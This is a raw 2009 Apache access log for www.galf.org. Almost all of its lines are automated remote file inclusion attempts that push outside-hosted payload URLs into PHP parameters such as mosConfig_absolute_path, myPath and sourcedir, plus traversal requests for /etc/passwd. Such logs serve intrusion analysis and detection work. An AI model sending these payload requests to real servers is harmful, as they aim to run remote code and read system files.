63.174.244.10 - - [08/Nov/2009:20:08:49 -0800] "GET /logs/access_090525.log//include.php?path[docroot]=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.12.74 - - [08/Nov/2009:20:09:05 -0800] "GET /logs/access_090406.log//index_inc.php?inc_ordner=http://www.kzk.ru/file/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:09:22 -0800] "GET /logs/access_090518.log/?sourcedir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:09:22 -0800] "GET /?sourcedir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:09:22 -0800] "GET /logs/?sourcedir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:09:46 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:09:46 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:09:47 -0800] "GET /logs/access_091012.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:09:51 -0800] "GET /logs/access_090921.log/?sourcedir=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:01 -0800] "GET /logs/access_091012.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:06 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:07 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:20:10:14 -0800] "GET /logs/access_090914.log//main.php?pagina=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:20:10:14 -0800] "GET /logs//main.php?pagina=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:20:10:14 -0800] "GET /main.php?pagina=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:39 -0800] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:39 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:39 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:41 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:41 -0800] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:41 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:44 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:44 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:10:44 -0800] "GET /logs/access_090525.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:20:11:05 -0800] "GET /logs/access_090914.log%20%20//main.php?pagina=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:11:47 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:11:47 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:11:47 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:20:11:53 -0800] "GET /logs/access_090629.log%20%20//main.php?pagina=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:12:05 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:20:13:03 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:20:13:03 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:04 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:04 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:05 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:14 -0800] "GET /logs/access_090525.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:14 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:14 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:22 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:22 -0800] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:22 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
67.214.143.99 - - [08/Nov/2009:20:13:26 -0800] "GET /logs/access_090601.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:20:13:30 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:20:13:30 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:20:13:30 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:20:13:38 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:13:39 -0800] "GET /logs/access_090504.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:20:14:22 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:20:14:22 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.214.143.99 - - [08/Nov/2009:20:14:22 -0800] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/disgore/copyright.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [08/Nov/2009:20:19:05 -0800] "GET /logs/access_090504.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lifeuniv.com/tmp/copyright.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:19:42 -0800] "GET /logs/index.php?rage=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:19:42 -0800] "GET /logs/access.log/index.php?rage=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:19:42 -0800] "GET /logs/access_090720.log/index.php?rage=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:19:42 -0800] "GET /index.php?rage=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
124.115.10.193 - - [08/Nov/2009:20:19:45 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
94.79.54.195 - - [08/Nov/2009:20:23:46 -0800] "GET /logs/access_090629.log//main.php?pagina=http://avto-tulun.ru/images/avatars/.source/one.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:04 -0800] "GET /setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:04 -0800] "GET /logs//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:04 -0800] "GET /logs/access_090406.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:04 -0800] "GET /logs/access_090504.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:22 -0800] "GET /logs/access_090420.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:22 -0800] "GET /logs/access_090831.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:27 -0800] "GET /logs/access.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:39 -0800] "GET /logs/access_090727.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:40 -0800] "GET /logs/access_090427.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:40 -0800] "GET /logs/access_090810.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:25:48 -0800] "GET /logs/access_090817.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:01 -0800] "GET /logs/access_090413.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:01 -0800] "GET /logs/access_090511.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:20:26:02 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:20:26:02 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:20:26:14 -0800] "GET /logs/access_090928.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:21 -0800] "GET /logs/access_090907.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.134.38.139 - - [08/Nov/2009:20:26:27 -0800] "GET /logs/access_090907.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://photoworld.com.ua////zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:32 -0800] "GET /logs/access_090824.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:32 -0800] "GET /logs/access_090803.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:32 -0800] "GET /logs/access_090622.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:32 -0800] "GET /logs/access_090706.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:37 -0800] "GET /logs/access_090525.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:42 -0800] "GET /logs/access_090608.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.230.112.35 - - [08/Nov/2009:20:26:51 -0800] "GET /logs/access_090720.log//setup.php?dir=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [08/Nov/2009:20:28:10 -0800] "GET /labia/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
204.14.90.22 - - [08/Nov/2009:20:28:40 -0800] "GET /logs/access_090914.log%20/?body=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
204.14.90.22 - - [08/Nov/2009:20:28:40 -0800] "GET /logs/access_090914.log%20/?body=./../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "-" "www.galf.org"
204.14.90.22 - - [08/Nov/2009:20:28:40 -0800] "GET /logs/?body=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 4942 "-" "-" "www.galf.org"
204.14.90.22 - - [08/Nov/2009:20:28:41 -0800] "GET /logs/?body=./../../../../../../../../etc/passwd HTTP/1.1" 200 4942 "-" "-" "www.galf.org"
204.14.90.22 - - [08/Nov/2009:20:28:41 -0800] "GET /?body=./../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
204.14.90.22 - - [08/Nov/2009:20:28:41 -0800] "GET /?body=./../../../../../../../../etc/passwd HTTP/1.1" 200 1048 "-" "-" "www.galf.org"
88.131.106.16 - - [08/Nov/2009:20:29:38 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [08/Nov/2009:20:29:38 -0800] "GET /cendoc/?D=D HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [08/Nov/2009:20:29:43 -0800] "GET /cendoc/?M=D HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.16 - - [08/Nov/2009:20:29:56 -0800] "GET /cendoc/?S=D HTTP/1.0" 200 510 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:20:31:33 -0800] "GET /logs/access_090921.log/?sourcedir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:20:31:33 -0800] "GET /?sourcedir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
77.221.130.17 - - [08/Nov/2009:20:31:33 -0800] "GET /logs/?sourcedir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:32:47 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:32:48 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:32:51 -0800] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:33:41 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:33:43 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:33:45 -0800] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:33:47 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:33:47 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:33:48 -0800] "GET /logs/access_090601.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:34:09 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:34:09 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:34:10 -0800] "GET /logs/access_090316.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:34:31 -0800] "GET /logs/access_090615.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:34:31 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
85.25.94.14 - - [08/Nov/2009:20:34:51 -0800] "GET /logs/access_090601.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
218.27.203.107 - - [08/Nov/2009:20:34:53 -0800] "GET /logs/access_090525.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://iad4151.co.kr/ace_del/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:35:11 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.189.18.242 - - [08/Nov/2009:20:36:07 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
